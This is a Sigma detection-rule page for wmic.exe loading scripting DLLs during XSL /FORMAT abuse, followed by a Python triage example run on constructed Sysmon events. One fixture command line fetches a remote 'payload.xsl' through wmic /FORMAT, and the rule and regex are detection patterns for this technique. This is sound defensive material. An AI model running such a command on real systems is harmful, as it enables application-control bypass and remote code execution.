WMIC Loading Scripting Libraries
Detects wmic.exe loading jscript.dll or vbscript.dll. That load happens when threat actors abuse the /FORMAT argument switch to download and execute an XSL stylesheet whose embedded script (e.g. JScript or VBScript) gives them proxied code execution and a bypass of application controls.
Sigma rule
title: WMIC Loading Scripting Libraries
id: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32
status: test
description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (e.g. one embedding JScript or VBScript).
references:
  - https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html
  - https://twitter.com/dez_/status/986614411711442944
  - https://lolbas-project.github.io/lolbas/Binaries/Wmic/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-17
modified: 2022-10-13
tags:
  - attack.defense-evasion
  - attack.t1220
logsource:
  category: image_load
  product: windows
detection:
  selection:
    Image|endswith: '\wmic.exe'
    ImageLoaded|endswith:
      - '\jscript.dll'
      - '\vbscript.dll'
  condition: selection
falsepositives:
  - The command wmic os get lastbootuptime loads vbscript.dll
  - The command wmic os get locale loads vbscript.dll
  - The ImageLoad event alone does not carry enough context to tell abuse from these benign invocations. Pivot to the process creation event that spawned wmic.exe and review its command line (a /FORMAT argument pointing at a URL or an .xsl file) and its parent/child processes before escalating.
level: medium
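The following is an added example, not part of the Sigma rule or the SigmaHQ project. It applies the rule's selection (Image ends with \wmic.exe, ImageLoaded ends with \jscript.dll or \vbscript.dll) to a handful of constructed Sysmon-style image-load events (Event ID 7) and then performs the triage the falsepositives section recommends: each hit is joined on ProcessGuid to its constructed process-creation event (Event ID 1) and the command line is checked for a /FORMAT argument that points at a URL, a UNC path, a drive path or an .xsl file. The Sysmon field names are real; the events, the ProcessGuid values and the /FORMAT regex are assumptions of this example.

```python
"""Added example: run the Sigma selection over constructed Sysmon events and
triage hits with the matching process-creation record.
Field names (EventID, ProcessGuid, Image, ImageLoaded, CommandLine, ParentImage)
follow Sysmon; the events below are constructed, not real telemetry."""

import re

# Selection from the rule. Sigma string modifiers on Windows are
# case-insensitive, so both sides are lowercased before comparing.
IMAGE_SUFFIX = "\\wmic.exe"
LOADED_SUFFIXES = ("\\jscript.dll", "\\vbscript.dll")

# Heuristic for the abuse the rule targets: /FORMAT pointing at a URL, a UNC
# path, a drive path or an explicit .xsl file. This regex is an assumption of
# this example, not part of the Sigma rule.
FORMAT_XSL = re.compile(
    r'/format\s*:\s*"?(https?://|\\\\|[a-z]:\\|[^\s"]*\.xsl)', re.IGNORECASE
)

# Constructed sample telemetry (not real logs).
IMAGE_LOADS = [
    {"EventID": 7, "ProcessGuid": "{A1}", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "ImageLoaded": "C:\\Windows\\System32\\jscript.dll"},
    {"EventID": 7, "ProcessGuid": "{B2}", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "ImageLoaded": "C:\\Windows\\System32\\vbscript.dll"},
    {"EventID": 7, "ProcessGuid": "{C3}", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "ImageLoaded": "C:\\Windows\\System32\\wbem\\wbemcomn.dll"},
    {"EventID": 7, "ProcessGuid": "{D4}", "Image": "C:\\Windows\\System32\\cscript.exe",
     "ImageLoaded": "C:\\Windows\\System32\\vbscript.dll"},
]
PROCESS_CREATES = {
    "{A1}": {"EventID": 1, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
             "CommandLine": 'wmic os get /FORMAT:"http://10.0.0.5/payload.xsl"'},
    "{B2}": {"EventID": 1, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
             "CommandLine": "wmic os get lastbootuptime"},
}


def matches_selection(event):
    """True when an image-load event satisfies the rule's selection."""
    if event.get("EventID") != 7:
        return False
    image = event.get("Image", "").lower()
    loaded = event.get("ImageLoaded", "").lower()
    return image.endswith(IMAGE_SUFFIX) and loaded.endswith(LOADED_SUFFIXES)


def triage(event, process_creates):
    """Classify a rule hit using the process-creation event with the same ProcessGuid.

    'suspicious'   - command line carries /FORMAT with a URL, UNC/drive path or .xsl
    'benign'       - command line is visible and shows no such /FORMAT target
    'uncorrelated' - no process-creation event found; cannot be closed as benign
    """
    proc = process_creates.get(event.get("ProcessGuid"))
    if proc is None:
        return "uncorrelated"
    if FORMAT_XSL.search(proc.get("CommandLine", "")):
        return "suspicious"
    return "benign"


def run(image_loads, process_creates):
    """Apply the selection to every event; return [(ProcessGuid, verdict)] for hits."""
    return [(e["ProcessGuid"], triage(e, process_creates))
            for e in image_loads if matches_selection(e)]


if __name__ == "__main__":
    for guid, verdict in run(IMAGE_LOADS, PROCESS_CREATES):
        print(guid, verdict)
```

Only the two wmic.exe events that load a scripting engine fire; the wbemcomn.dll load and the cscript.exe load do not. The hit backed by a /FORMAT URL is escalated, the `wmic os get lastbootuptime` hit is closed as one of the documented false positives, and a hit with no matching process-creation event is left open rather than silently dropped, since missing context is not evidence of benign use.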
Related rules
- Msxsl.EXE Execution
- XSL Script Execution Via WMIC.EXE
- AD Object WriteDAC Access
- ADS Zone.Identifier Deleted By Uncommon Application
- AMSI Bypass Pattern Assembly GetType